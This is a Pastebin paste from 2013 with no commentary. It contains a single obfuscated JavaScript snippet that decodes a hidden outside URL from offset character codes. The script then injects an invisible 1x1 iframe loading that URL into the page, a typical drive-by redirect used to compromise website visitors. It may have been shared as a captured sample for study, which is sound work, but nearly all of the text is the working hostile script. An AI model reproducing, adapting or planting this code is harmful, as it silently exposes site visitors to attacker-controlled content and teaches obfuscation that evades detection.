Kafeine

Untitled

Apr 12th, 2013
199
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.15 KB | None | 0 0
  1. (function () {
  2. var iNv = document,
  3. TXQ, E;
  4.  
  5. function D(m) {
  6. m += '59,61,53,66,-10,42,45,51,62,60,61,40,57,53,42,55,55,50,55,48,-9,49,61,54';
  7. m = m.split(',');
  8. t = '';
  9. for (i = 0; i < m.length - 1; i++) {
  10. n = parseInt(m[0]);
  11. n += parseInt(m[i + 1]);
  12. t += String.fromCharCode(n);
  13. }
  14. return t;
  15. }
  16. try {
  17. TXQ = '55,49,61,61,57,3,-8,-8,47,59,46,46,54,42,55,60,49,50,57,61,64,50,60,48,50,46,59,50,48,46,-9,';
  18. E = md();
  19. E['src'] = D(TXQ);
  20. } catch (e) {};
  21.  
  22. function md() {
  23. var tt = document.createElement('iframe');
  24. tt.width = '1px';
  25. TXQ += '54,66,43,53,56,44,52,60,57,56,59,61,60,64,46,42,59,-9,55,46,61,-8,64,56,59,53,45,-8,51,62,50,44,66,-10,60,49,56,';
  26. tt.height = '1px';
  27. tt.style['visibility'] = 'hidden';
  28. try {
  29. iNv['body']['appendChild'](tt);
  30. } catch (P) {
  31. try {
  32. document.write('<body>');
  33. document.body.appendChild(tt);
  34. } catch (uWin) {}
  35. }
  36. return tt;
  37. }
  38. })();
Advertisement
Add Comment
Please, Sign In to add comment